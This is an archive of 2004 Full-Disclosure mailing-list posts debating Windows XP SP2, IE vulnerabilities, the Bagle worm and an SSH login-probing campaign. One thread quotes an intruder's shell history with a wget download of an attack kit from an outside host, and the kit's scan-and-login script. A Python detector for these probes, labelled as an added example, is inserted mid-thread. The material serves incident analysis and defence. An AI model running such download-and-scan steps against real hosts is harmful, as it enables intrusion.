chance of being penetrated by a worm or virus because they have avoided the
mono-culture... What happens if this is very successful and you have a new
mono-culture... Oops. 

My Windows machines I use do real multitasking, are stable, and are not
prone to virii. In fact I can't recall the last virus I had, I think it
might 

RE: [Full-Disclosure] lame b!tching about xpsp2

2004-08-16 Thread joe
Your computers can have different OSes on them. Your OS can run on
different brands of computers; you can run different Office Suite packages
on your different OSes (even Windows). 

Contrariwise, I can't run diesel in my gasoline engine, can't run jet fuel
either. I can't easily take the heads from a Chevy and put them on a Ford. I
can't put a bar of Ivory in my dishwasher and expect my dishes to turn out
very clean. 

What is your point here?


Shooting for computers as appliances for a majority of the users out there
is a good and noble thing. They are, after all, simply tools. I personally
don't want an appliance, but I am not a normal user like the vast majority
of the users. 

To bring this back to security and the topic at hand. SP2 does not make it
so a machine doesn't require patching. It is an attempt to reduce the rush
sometimes required for patching. It may or may not fail in that regard but
at the very least it is an attempt in that direction. All of your griping is
simply griping against someone trying to make the environment better. 

If anything you should be pushing this update. You aren't going to get
people to dump Windows no matter how much you rant about it. You might as
well be tilting at windmills instead of Windows. Even if this update
doesn't fix everything you think it should fix and in the way you think it
should fix it, at least it is an attempt to fix it. So you don't have to
cheer it or tell people it is the greatest thing, but you should tell people
that their Windows machine is more secure with it than without it.

  joe



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of devis
Sent: Friday, August 13, 2004 11:39 PM
To: Joshua Levitsky; Full-disclosure
Subject: Re: [Full-Disclosure] lame b!tching about xpsp2

Do you buy devices (car or dish washer) that take only one kind of
petrol or one kind of washing powder? No? Cause that was the point made.

And btw, nice signature Joshua, but I bet you get that all the time.
lmao.


- Oh, I see, one of those 'need to know' basis jobs, is it?
- Exactly, you get to know only what you need to know!



RE: [Full-Disclosure] lame bitching about xpsp2

2004-08-16 Thread joe
. It isn't there yet and at present, the interface is
still chasing what MS has, not revolutionizing it. 

You obviously also do not understand the concept of a monopoly. A monopoly
is when there is only one supplier of a good or service, there is no choice
period. This does not describe the situation we have. Anyway, it isn't an end to
monopoly you are looking for. It is an end to MS, if SUSE (or name your fav
vendor) should all of a sudden become immensely popular and own 99% of the
desktops you would be singing some religious hymn about it. Not touting how
bad monopolies are. 

Criticism is absolutely not banned, but if you are going to criticize,
understand what you are talking about. You run around spouting half truths
and incorrect information intermixed with religious quotes like it means
something simply because you believe it must be so probably because you have
heard it from 14 other religious zealots. 


 Define security ? Define company Policy of Internet and Computer usage ?

Consider the real world. We actually didn't back down on our stance of what
we did, though we took a beating for a long time over it. Even the lower
costs of support didn't quell the complaining. While it is true the PCs are
the company's PCs and any way they want to configure them is up to them,
they also have to look at whether or not the configuration causes a slow
down in productivity. If people are always bitching because they can't load
their favorite news program (pointcast was the big one back then)
productivity goes down. You can threaten the people with disciplinary action
but you can't fire your entire marketing department or treasury department. 


 So that's the reason to still give administrator rights to the default 
 install ? Do you realise that unpatched machines get infected in a 
 breeze because the default user has Administrator rights ?

If I install Linux or BSD right now from CD, do I or do I not have root
access? Am I allowed to log on and use root? 


 The cost in patching is nothing compared to the cost in software 
 licenses and that's what it was about.

LOL! At home, I completely agree with you. Get a job in a large company some
time. And by large I mean hundreds of thousands of machines. 


 Are you an idiot ?? Do you understand technically why a virus CANNOT 
 EASILY spread on a nix based permissions filesystem ? If not, look up to 

Nope, and contrary to your writing I don't believe you are either. I just
think you may be misinformed and a bit too far into the zealot stage. You seem
to think that every issue is due to some hole, totally disregarding the
issues with users simply doing anything they are told to do in an email or
instructions. Is it tougher to spread something in the *nix world, yes. Is
it because it is inherently safer? No. 


 

My Windows machines I use do real multitasking, are stable, and are not
prone to virii.

Yours. The average compromised box out there isn't. And in 90 % of the 
cases,  it is a M$ machine. Coincidence ? Sure

Nope, not at all. Consider the penetration of Windows compared to anything
else. Windows has more dumb users than any other operating system in the
history of computers. Simple fact, you can't get around it. If they all
jumped to Mac OSX, Mac OSX would have the most dumb users in the history of
computers. As surely as that number moved, so would the most attacked and
penetrated platform numbers. 

If the level of intelligence and capability of Windows users came up to the
level of Linux users and especially of BSD users then many issues would
slide into the background. Unfortunately for Linux, its users' intelligence
averages are going to go down as they get more penetration of the desktops.
Watch how Linux gets dumbed down for their use and as issues start to creep
in more and more. 



 1) Get your facts right before defending some company that obviously you 
 don't know. Ever read the EULA ? I doubt.
 2) Accept that Criticism will always enrich our vision and accept that 
 people CAN, and SHOULD for obvious reasons, not feel part of that MASS 
 that you embrace. Happy to feel normal ?

I agree with these statements. Get your facts straight. As for criticism, I
fully accept it. I dish out far more of it to MS than I think you ever will,
I just tend to do it in a forum that will accomplish something. I have had
MS chasing me down for pissing them off. I have also watched them slowly
trying to get better. As I always say on this list, I don't look at this as
religion. I think religion has screwed the world up enough. A lot of stupid
people saying and doing a lot of stupid things in the name of religion,
whether that be for a god or for an OS. 


So now, to bring this back... Do you have any valid gripes about XP SP2 that
you have encountered, or is your entire story one of whining about things you
don't really know about? 





-Original Message-
From: devis [mailto:[EMAIL PROTECTED] 
Sent: Monday, August 16, 2004 3:23 PM
To: joe; Full

RE: [Full-Disclosure] SP2 is killing me. Help?

2004-08-12 Thread joe

The worst problem I have encountered with XP SP2 to date on 3 virtual
machines and two physical machines is the physical machine with dual
monitors needed two reboots after the install to get the display up on the
extension monitor. I got a Windows Popup saying a piece of software needed
an update (Nero) for this version of Windows with an actual link to the
company's website, that was pretty nice and I dare say not many OS vendors do
things like that. I can't say that I am not annoyed by some of the changes
such as all the new security dialogs that pop up and such, but being annoyed
isn't a valid reason to gripe when we have been telling MS to fix their
stuff and they actually make the attempt. Telling me something is trying to
download a file in IE or that an installation file I am trying to run isn't
from a known publisher is enhanced security, no matter how annoying it may
possibly be. :o)

What are the specific issues you personally have encountered? We don't need
people running around quoting other stories and other complaints about how
bad it was for some other person they read about or heard about through the
grapevine. Basically if you don't have an issue that you specifically
encountered YOURSELF on YOUR MACHINE that you are looking to tell people
about to get help or document the workaround/fix, shut up, here and
everywhere else. Stop wasting bandwidth. The only person who wants to hear
your opinion on the Service Pack is you. Stories of people's issues with RC2
which is the link you posted really shouldn't hold back people from
installing RTM. Install it, sort out the issues, work to correct them. 

Re: your SP statement... In the mid/late 90's Microsoft was going to attempt
an SP every quarter as NT4 was still pretty fresh. I think SP2 was Jan 97 or
so, and SP3 was May 97 or so. That would have fit the schedule they were
trying for. I believe they backed off of that because it was too much for
them internally AND corporate customers such as the bank I worked for at the
time requested them to slow down since corporate IT groups had troubles
getting a full SP tested and out the door every quarter. The same reason
corporate IT groups requested MS release hot fixes once a month instead of
whenever unless the fix was ready and there was an immediate threat. 

As several others on this list have pointed out multiple times, this Service
Pack will break some things. First off, all Service Packs tend to break
things because they are changing functionality and fixing mistakes and some
companies depend on those mistakes or the functionality being a very
specific way with no exception process when it isn't that exact way.
Additionally, Microsoft has been admitting that this SP would be extra harsh
for some time which is why they had such an open beta and RC testing phase.
They wanted to try and catch as much as possible prior to the release.
People inside of MS didn't have a choice but to run the betas and RCs. If
the employees didn't load it, it got forced down onto their machines anyway.
MS was very diligent about chewing each piece of it. 

Still, things will break. How can you not expect them to break? People have
been whining here for some time that MS is doing this and this and that
wrong and paying too much attention to legacy apps and worrying about
breaking them. Now MS has said, ok, we will work towards security and not be
as worried about apps that people currently run. They haven't been as
aggressive in that area as they could be and that was a complaint I had.
However seeing the whining produced based on how aggressive they were, makes
me realize why they chose not to be as aggressive as they could have been. 

Just because something ran before and doesn't run now doesn't mean it is
Microsoft's fault. It could be that the vendor or local programmer who wrote
the program that doesn't work for you now simply didn't do it correctly.
There are a lot of crap apps out there written by people with no security
understanding and very little programming understanding. Hopefully this will
encourage some of them to get better.

Plain and simple, you can't complain that MS is doing a poor job at trying
to get better and then in the next breath complain about changes they make
to try and do a better job. If MS doesn't change things, things have no
chance at getting better. So you can whine that MS isn't doing anything to
make the OS better or you can whine that they are changing things and
breaking stuff. You can't do both. There will be issues, no one writes
perfect code. No one will EVER write perfect code. Doesn't matter if it is some
guy in his basement working on some open source project or some guy in
Building 41 on Microsoft's Redmond Campus working on an MS OS kernel. 


 joe


 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Darren Reed
Sent: Thursday, August 12, 2004 1:29 AM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] SP2

Re: [Full-Disclosure] (no subject)

2004-08-09 Thread joe smith
Kaspersky detects it as I-Worm.Bagle.al
Todd Towles wrote:
I am seeing a lot of them too. Just had a call from my e-mail people. I have
one that is new_price.zip (5KB)
There appears to be some people on FD that are infected and we are getting a
lot on my end.
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Jonathan
Grotegut
Sent: Monday, August 09, 2004 2:04 PM
To: Full-disclosure
Subject: RE: [Full-Disclosure] (no subject)
(In regards to new_price.zip file attachment)
Anyone have any idea what this is, we had some clients just get hit pretty
hard with this email.  I am unable to find anything on it, from my VERY
Limited knowledge it appears to be a virus exploiting one of the many
holes in IE.  Anyone else see anything on this yet?
Jonathan Grotegut
 



RE: [Full-Disclosure] SP is here (soon) !

2004-08-06 Thread joe
XP SP2 Final is up on MSDN Downloads for the MSDN Subscribers. English and
German as of right now. 

  joe

 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Marc Rees
Sent: Friday, August 06, 2004 12:59 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] SP is here (soon) !

Go to :
http://www.microsoft.com/windowsxp/downloads/updates/sp2/cdorder/en_us/defau
lt810.mspx

I'm French. So I select France in the country section. And select Windows XP
SP French CD in the language section. Last, click on Order now.

Microsoft VBScript compilation  error '800a03f6' Expected 'End'
?, line 0'

Someone needs SP3 ;)

Marc Rees
www.acbm.com




[Full-Disclosure] New IE patch

2004-07-30 Thread joe smith
Perfect timing for System Admin Day, a new IE patch
http://www.microsoft.com/technet/security/bulletin/ms04-025.mspx


Re: [Full-Disclosure] Re: Automated SSH login attempts?

2004-07-29 Thread joe smith
you can decompile using REC.
http://www.backerstreet.com/rec/rec.htm
Andrei Galca-Vasiliu wrote:
By the way, you have to be root to use ss:
[EMAIL PROTECTED]:~/ssh$ ./go.sh 82.77.45
scanning network 82.77.*.*
usec: 3, burst packets 50
using inteface eth0
ERROR: UID != 0
In a mail dated Thursday 29 July 2004 19:38, Stefan Janecek
wrote:
 

Hmmm - I have also been getting those login attempts, but thought them to
be harmless. Maybe they are not *that* harmless, though... Today I
managed to get my hands on a machine that was originating such login
attempts. I must admit I am far from being a linux security expert, but
this is what I've found out up to now:
Whoever broke into the machine did not make any attempt to cover up his
tracks - this is what I found in /root/.bash_history:
--
id
uname -a
w
id
ls
wgte frauder.us/linux/ssh.tgz
wget frauder.us/linux/ssh.tgz
tar xzvf ssh.tgz
tar xvf ssh.tgz
ls
cd ssh
ls
./go.sh 195.178
ls
pico uniq.txt
vi uniq.txt
ls
rm -rf uniq.txt
./go.sh 167.205
ls
rm -rf uniq.txt  vuln.txt
./go.sh 202.148.20
./go.sh 212.92
./go.sh 195.197
./go.sh 147.32
./go.sh 213.168
./go.sh 134.176
./go.sh 195.83
--
um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two
binaries:
go.sh:
---
./ss 22 -b $1 -i eth0 -s 6              # scan the prefix given as $1 for port 22; ss writes bios.txt
cat bios.txt | sort | uniq > uniq.txt   # dedupe the hit list (the '>' was lost in the archive)
./sshf                                  # try the logins against every host in uniq.txt
---
* 'ss' apparently is some sort of portscanner
* 'sshf' connects to every IP in uniq.txt and tries to log in as user
'test' first, then as user 'guest' (according to tcpdump).
This does not seem to be a stupid brute force attack, as there is only
one login attempt per user. Could it be that the tool tries to exploit
some vulnerability in the sshd, and just tries to look harmless by using
'test' and 'guest' as usernames?
The compromised machine was running an old debian woody installation
which had not been upgraded for at least one year, the sshd version
string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'
As already mentioned, I am far from being an expert, but if I can assist
in further testing, then let me know. Please CC me, I am not subscribed
to the list.
cheers,
Stefan


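
Stefan's description above (a scanner builds a host list, then sshf tries exactly
one login as 'test' and one as 'guest' against each host) gives a usable detection
signature: one failed attempt per account, across a small fixed set of accounts,
from a single source, with no retries. The script below is an added example and
is not code from this thread or from the ssh.tgz kit. It parses a constructed
OpenSSH auth.log excerpt (the two probing addresses are the ones Joe Hickory
reports in this thread; every other address, PID and timestamp is made up) and
labels each source. The probe account list and the min_users threshold are
assumptions; the 'spray' verdict goes beyond Stefan's specific case and catches
the same one-try-per-account technique run with a different word list.

```python
import re
from collections import defaultdict

# Constructed auth.log excerpt for this example; these lines are not from the
# original post. The two probing addresses are the ones reported in this
# thread; every other address, PID and timestamp is made up.
SAMPLE_AUTH_LOG = """\
Jul 27 03:14:05 host sshd[2211]: Failed password for illegal user test from 212.89.103.132 port 44123 ssh2
Jul 27 03:14:07 host sshd[2213]: Failed password for illegal user guest from 212.89.103.132 port 44130 ssh2
Jul 27 03:20:11 host sshd[2250]: Failed password for illegal user test from 66.250.111.33 port 51002 ssh2
Jul 27 03:20:13 host sshd[2252]: Failed password for illegal user guest from 66.250.111.33 port 51010 ssh2
Jul 27 08:01:44 host sshd[3011]: Failed password for alice from 10.0.0.5 port 40001 ssh2
Jul 27 08:01:49 host sshd[3011]: Failed password for alice from 10.0.0.5 port 40001 ssh2
Jul 27 08:01:55 host sshd[3011]: Accepted password for alice from 10.0.0.5 port 40001 ssh2
Jul 27 09:30:00 host sshd[3300]: Failed password for illegal user oracle from 198.51.100.7 port 33001 ssh2
Jul 27 09:30:02 host sshd[3302]: Failed password for illegal user admin from 198.51.100.7 port 33009 ssh2
Jul 27 09:30:04 host sshd[3304]: Failed password for root from 198.51.100.7 port 33015 ssh2
Jul 27 10:00:00 host sshd[3400]: Failed password for root from 203.0.113.9 port 2200 ssh2
Jul 27 10:00:03 host sshd[3400]: Failed password for root from 203.0.113.9 port 2200 ssh2
Jul 27 10:00:06 host sshd[3400]: Failed password for root from 203.0.113.9 port 2200 ssh2
"""

# OpenSSH 3.x logs "illegal user" for unknown accounts; later releases say
# "invalid user". Both are accepted, as is any auth method name after "Failed".
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed \w+ for (?:(?:illegal|invalid) user )?(?P<user>\S+) from (?P<ip>[\d.]+)"
)
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted \w+ for (?P<user>\S+) from (?P<ip>[\d.]+)")

# Accounts the ssh.tgz kit was seen trying (per the tcpdump in the thread).
# Treated here as an assumed probe list; extend it as new kits appear.
PROBE_USERS = frozenset({"test", "guest"})


def summarize(log_text):
    """Return (failures, accepted): failures is {ip: {user: count}},
    accepted is {ip: set(users)} for logins that succeeded."""
    failures = defaultdict(lambda: defaultdict(int))
    accepted = defaultdict(set)
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[m.group("ip")][m.group("user")] += 1
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            accepted[m.group("ip")].add(m.group("user"))
    return failures, accepted


def classify(failures, accepted, probe_users=PROBE_USERS, min_users=2):
    """Label every source IP that produced at least one failure.

    probe   -- >= min_users distinct probe accounts, exactly one failed try
               each and no success: the one-try-per-account pattern Stefan saw.
    spray   -- >= min_users distinct accounts at one try each, outside the
               probe list: the same technique with a different word list.
    success -- a login was accepted from an IP that also failed; look at it.
    retry   -- repeated failures against the same account (typos, or a
               plain brute force if the count is large).
    """
    verdicts = {}
    for ip, per_user in failures.items():
        if accepted.get(ip):
            verdicts[ip] = "success"
            continue
        single_try = {u for u, n in per_user.items() if n == 1}
        if len(single_try & probe_users) >= min_users:
            verdicts[ip] = "probe"
        elif len(single_try) >= min_users:
            verdicts[ip] = "spray"
        else:
            verdicts[ip] = "retry"
    return verdicts


def report(log_text):
    """Parse and classify in one call."""
    failures, accepted = summarize(log_text)
    return classify(failures, accepted)


if __name__ == "__main__":
    for ip, verdict in sorted(report(SAMPLE_AUTH_LOG).items()):
        print(f"{ip:16} {verdict}")
```

On the sample the two addresses from the thread come out as 'probe', the
made-up 198.51.100.7 as 'spray' and the repeated root failures as 'retry'. On
a real auth.log, treat 'success' as the verdict that needs a human first, and
widen PROBE_USERS once you know what the kit on your network actually tries.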


Re: [Full-Disclosure] Automated SSH login attempts?

2004-07-27 Thread Joe Hickory
hi fd, 
 
got that too, starting at the 15.07. from these two addresses:
212.89.103.132 
and 66.250.111.33 
 
I have some ssh debug level 3 output from these attempts and tcpdump and
sebek packets logged. But as the users do not exist on the systems, I don't
think it would provide new info.
 
if anybody wants to analyse the data, contact me offlist. 
 
joe 



RE: [Full-Disclosure] IE

2004-07-20 Thread joe
IBM doesn't actually offer support, or at least didn't when we spent 18
months researching it over the last couple of years. I consulted for a company
that was looking at IBM heavily because the current CIO previously worked for
IBM. The 18 months was spent going over the various offerings and statements
IBM made when trying to get standards in place to deploy Linux in any
serious non-backroom way. The big quote going around in the trenches was
that IBM better have some pixie dust because what we are seeing in the real
world doesn't stack up to their claims.

Basically the support falls through to the vendor from which you separately
buy the OS; Red Hat or Suse were the options. The big thing IBM offered
was that they would help you write custom code against the various versions,
but the costs were extremely substantial and then you were in a weird zone
of support where the people we spoke to couldn't really say how we would be
supported, but that they would try to get the changes we paid for implemented
in the main source tree so we could be supported by the OS vendor. 



 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Rodrigo Barbosa
Sent: Monday, July 19, 2004 5:22 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] IE

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Mon, Jul 19, 2004 at 03:00:31PM -0500, [EMAIL PROTECTED] wrote:
 In addition to the below, my company's management wants to buy it's 
 software from some big player.  Open source software isn't 
 supported, they say.

Fine. Have them talking to RedHat, or even IBM.

Yes, I think IBM is a big enough player.

- --
Rodrigo Barbosa [EMAIL PROTECTED] Quid quid Latine dictum sit,
altum viditur
Be excellent to each other ... - Bill  Ted (Wyld Stallyns)

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQFA/DtipdyWzQ5b5ckRAvwmAJ9lZHIPx4oNxrwk9ep93B6EAWxHHQCdF/U7
oy2rlD0DNhKq2DvSaHNVM2M=
=Xy1D
-END PGP SIGNATURE-



RE: [Full-Disclosure] How big is the danger of IE?

2004-07-08 Thread joe

http://www.kb.cert.org/vuls/id/713878

The link above is the advisory that theregister is talking about. I know it
is unusual for theregister but they seemed to have missed a hefty part of
the whole advisory when reporting it.



Here is the specific section:


III. Solution
Until a complete solution is available, consider the following workarounds. 

Disable Active scripting and ActiveX

Disabling Active scripting and ActiveX controls in the Internet Zone (or any
zone used by an attacker) appears to prevent exploitation of this
vulnerability. Disabling Active scripting and ActiveX controls in the Local
Machine Zone will prevent widely used payload delivery techniques from
functioning. Instructions for disabling Active scripting in the Internet
Zone can be found in the CERT/CC Malicious Web Scripts FAQ. See Microsoft
Knowledge Base Article 833633 for information about securing the Local
Machine Zone. Also, Service Pack 2 for Windows XP (currently in beta
release) includes these and other security enhancements for IE.

Apply the Outlook Email Security Update

Another way to effectively disable Active scripting in Outlook is to install
the Outlook Email Security Update. The update configures Outlook to open
email messages in the Restricted Sites Zone, where Active scripting is
disabled by default. In addition, the update provides further protection
against malicious code that attempts to propagate via Outlook. The Outlook
Email Security Update is available for Outlook 98 and Outlook 2000. The
functionality of the Outlook Email Security Update is included in Outlook
2002 and Outlook Express 6. Outlook 2003 includes these and other security
enhancements.

Read and send email in plain text format

Outlook 2003, Outlook 2002 SP1, and Outlook 6 SP1 can be configured to view
email messages in text format. Consider the security of fellow Internet
users and send email in plain text format when possible. Note that reading
and sending email in plain text will not necessarily prevent exploitation of
this vulnerability.

Maintain updated anti-virus software

Anti-virus software with updated virus definitions may identify and prevent
some exploit attempts. Variations of exploits or attack vectors may not be
detected. Do not rely solely on anti-virus software to defend against this
vulnerability. US-CERT maintains a partial list of anti-virus vendors.

Do not follow unsolicited links

Do not click on unsolicited URLs received in email, instant messages, web
forums, or internet relay chat (IRC) channels. While this is generally good
security practice, following this behavior will not prevent exploitation of
this vulnerability in all cases, particularly if a trusted site has been
compromised or allows cross-site scripting.

Use a different web browser 

There are a number of significant vulnerabilities in technologies relating
to the IE domain/zone security model, the DHTML object model, MIME type
determination, and ActiveX. It is possible to reduce exposure to these
vulnerabilities by using a different web browser, especially when browsing
untrusted sites. Such a decision may, however, reduce the functionality of
sites that require IE-specific features such as DHTML, VBScript, and
ActiveX. Note that using a different web browser will not remove IE from a
Windows system, and other programs may invoke IE, the WebBrowser ActiveX
control, or the HTML rendering engine (MSHTML). 



 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Skander Ben
Mansour
Sent: Thursday, July 08, 2004 3:59 PM
To: 'Yaakov Yehudi'; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] How big is the danger of IE?

SNIP

CERT recently recommended using a different web browser:
http://www.theregister.co.uk/2004/06/28/cert_ditch_explorer/
http://www.us-cert.gov/current/current_activity.html#iis5
There are a number of significant vulnerabilities in technologies relating
to the IE domain/zone security model, the DHTML object model, MIME type
determination, and ActiveX. It is possible to reduce exposure to these
vulnerabilities by using a different web browser, especially when browsing
untrusted sites. Such a decision may, however, reduce the functionality of
sites that require IE-specific features such as DHTML, VBScript, and
ActiveX. Note that using a different web browser will not remove IE from a
Windows system, and other programs may invoke IE, the WebBrowser ActiveX
control, or the HTML rendering engine (MSHTML). 

I hope this helps.

Best Regards,

Skander Ben Mansour



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Yaakov Yehudi
Sent: Thursday, July 08, 2004 7:59 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] How big is the danger of IE?


I would be interested to hear just how big the danger of IE is.  
How could it affect the privacy of big business?, or any business for that
matter?  

or what about the Government - could information leak from government

RE: [Full-Disclosure] How big is the danger of IE?

2004-07-08 Thread joe
I'm trying to understand whether the issue you are implying sarcastically in
your last statement is with pulling similar functionality out of single
programs and putting it into DLLs, or that MS offers products to do many
different things, or that you can seamlessly work with documents across
applications, thereby more easily putting them together (instead of, say,
building a spreadsheet in Excel, working on formatting it, printing it
separately, then taking a Word doc and printing it separately and then
collating the sheets together). 


  Thanks, joe


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Eric Paynter
Sent: Thursday, July 08, 2004 12:23 PM
To: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] How big is the danger of IE?

On Thu, July 8, 2004 8:07 am, Sapheriel said:
 i didn't know IE also displays e-mails and power point files.

It doesn't. But the IE rendering engine (read: DLLs) is used by most MS
programs to render HTML, which can be embedded into almost any document
type. Pretty much any IE exploit will work in any of these programs as well.
Isn't the whole integrated Microsoft suite a wonderful concept?

-Eric

--
arctic bears - affordable email and name services @yourdomain.com
http://www.arcticbears.com



RE: [Full-Disclosure] IE Web Browser: Sitting Duck

2004-07-07 Thread joe
Holy crap, I can not believe I totally forgot about adventure... 

We took it straight away and ported it to BASIC-PLUS because on RSTS/E that
was one of the RTSs (shell if you will) and was interpreted so we could
change it without sending it to batch overnight for the compile like we had
to do with F77. One of my CompSci instructors wanted me to rewrite it in
Macro for my MASM final project to show it could be done. I kept showing him
the code along the way and he was quite surprised when it actually ended up
being a Reverse-Polish functional scientific calculator complete with
graphics on the VT-52 when I handed it in. I always had a feeling he didn't
really know what he was reading when looking at code, especially MASM, that
was the final proof. :o)

  joe


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Dave Horsfall
Sent: Wednesday, July 07, 2004 2:17 AM
To: Full Disclosure List
Subject: RE: [Full-Disclosure] IE Web Browser: Sitting Duck

On Wed, 7 Jul 2004, joe wrote:

 Of course you had FORTRAN and COBOL as well but you couldn't do fun 
 games in those.

You mean like Adventure?  I still have the original FORTRAN source for that
somewhere on a tape.

-- Dave



RE: [Full-Disclosure] IE Web Browser: Sitting Duck

2004-07-07 Thread joe
I don't think anyone can propose a realistic test at this point in time. I
don't think one is possible until you get some sort of large non-techno-weenie
install base going for *nix or another OS for that matter. As
another poster pointed out, the diversity and chaos in the open source world
right now helps contribute to its safety as there is no large exposed
surface in terms of Microsoft large. Plus MS simply makes good news. 

Once more non-weenies hit the OS and start doing things, something will
start to take a majority because friends will tell their other friends about
this specific version and the people running it won't be of the type to keep
swapping things around and trying other things and someone will come up with
some decent marketing or distribution method that appeals to the mass
market. In terms of marketing and distribution right now from what I see
that could very well be Lindows aka Linspire. I'm waiting for them to start
giving away Lindows PCs to schools actually like Apple did/does. They have
Apple beat because while a school could get it cheap, little billy at home
wasn't so lucky as mom and dad looked at the price in the store and said no
way. Do that with Lindows PCs, then mom and dad go to Walmart because billy
talks about how he likes it so much and lo and behold they see on the shelf a
whole PC for $300 or so. Hopefully they keep Lindows on it instead
of realizing, hey this isn't what mommy and daddy like and go to ebay and
buy a pirated copy of XP that can't be updated with security fixes because
MS in its infinite wisdom decided that people who don't buy legit don't get
to have security. You want to complain about MS, complain about that.  

I can say in my experience that I have seen fewer RSTS/E worms and viruses
than *nix but it doesn't mean it is more secure. At that point though there
weren't lists going around distributing the holes to the kids to exploit and
people going oh my god, DEC is evil, RSTS/E sucks, SunOS is MUCH better and
more secure. If we found a really bad issue, we would tell DEC and we would
tell any companies we were friendly with that we knew were running the same
thing.  I guess we weren't quite as religious then. If we wanted religion,
we went to church. We simply used computers to do our jobs.

  joe
 



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Bruce Ediger
Sent: Wednesday, July 07, 2004 8:41 AM
To: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] IE Web Browser: Sitting Duck

SNIP

Can you propose a test of the install-based theory?  If not, I wish you
wouldn't use it, it's little more than special pleading for the use of
Microsoft products.



RE: [Full-Disclosure] IE Web Browser: Sitting Duck

2004-07-07 Thread joe
Actually MS does support the use of alternative shells. However you couldn't
and shouldn't expect that if you have, say, a Thunderbird shell that MS would
support that shell, just the underpinnings beneath it. Just like they don't
support, say, Lotus, but they do support the underlying OS API calls. 

As for breaking things, it goes back to the same DLL point. If an app is
built on the concept that that shell would be there and has dependencies on
it, yes it will break. The only thing I can say to that is yeah, of course.
Most of the GUI admin tools from MS depend on those shell dependencies,
again, to that I say... Of course. However if you want to write your own,
you can. The Windows API core pieces are still there and fully exposed and
you don't have to use the Shell API calls and avoid the Shell DLLs. It will
take you a bit longer to write anything though I would expect unless you
have already built up your own lib.

There are many embedded and POS and other machines running Windows and not
using the Explorer shell. They are still called Windows machines. 

  joe

 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Barry
Fitzgerald
Sent: Wednesday, July 07, 2004 9:56 AM
To: joe
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] IE Web Browser: Sitting Duck

joe wrote:

It is a core component of the current Windows UI, this is not the same 
as being a core component of Windows. Explorer is simply a UI shell 
that sits on the operating system known as Windows. The entire shell is 
replaceable and has been for a long time, since at least Win3.1.

  


I appreciate the technical explanation even though I knew, well, all and
more of it.

You probably could have saved some time if you had read my relatively short
message fully and seen that I did acknowledge that IE is not part of the
kernel (which is really what you're trying to say) and that it's a part of
MS Windows as a software distribution.  I'm fully aware that you can replace
the shell in windows.

However, IE and the windows UI is a part of MS Windows as a software
distribution and it's an essential part.  I dare say that if you remove the
UI and DLLs of MS Windows, all you have left is a relatively crappy kernel
with a lot of software that won't work. 

The MS Windows UI and Internet Explorer are a core part of the MS Windows
operating system.  When you remove them, you break compatibility with many
of the available programs and I'd venture to say that Microsoft would not
support a highly modified system like the ones that you're describing. 

One can remove the Glibc from any GNU/Linux distribution.  I wish them luck
trying to run programs that are dynamically linked. 

Is the Glibc a core part of Linux the kernel?  Of course not.

Is the Glibc a core part of the GNU/Linux OS distribution?  Yes, it is.

I think that for all of the technical explanations that you've given, you're
losing the argument on one simple phrase: software distribution.

-Barry

p.s. Come on people.  We went through the what does an OS really
constitute? argument back in like 1996.  This isn't bloody kindergarten.



RE: [Full-Disclosure] What a difference a char makes...

2004-07-07 Thread joe
Thanks Nick, you should find this corrected now.

  joe 



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Nick FitzGerald
Sent: Saturday, July 03, 2004 1:00 AM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Subject: [Full-Disclosure] What a difference a char makes...

MS does it again...

I'm not sure whether to laugh or cry.

   http://www.microsoft.com/security/incident/Download_Ject.mspx

   ...

   Actions for Home Users

   ...

   2. Check for Infection

   ...

  3.  At the command prompt, type:
  dir /a /s /b &systemdrive%\kk32.dll
  and then press the ENTER key to search your
  computer.
  If the file is present, the file path is displayed. If
  the file is not present, a message is displayed
  that the system cannot find the path.

There's no prize for spotting the typo, nor for guessing what your typical
home user's reaction will be if they actually follow this advice.

On reflection, perhaps there should be a prize for the latter, as accurately
guessing that could be quite tricky.  Due to the error (repeated in step 4
-- the glories of cut'n'paste...) the user will receive a possibly quite
long directory listing (after all, at least on Win2K and XP the default
directory for the command prompt will be the current user's homepath
directory which houses, by default, as one of its many sub-directories, IE's
TIF) followed by the message, as the very last line of output:

   The system cannot find the path specified.

...

Does MS not employ technical writers?

What about tech reviewers?

What about the age-old publishing concept of having some vaguely clueful
person _who had nothing to do with the generation or layout of the content_
look critical new web pages over before publishing them? 
OK, so this is the web, but critical information still does not deserve an
attitude of it's just the web, does it?

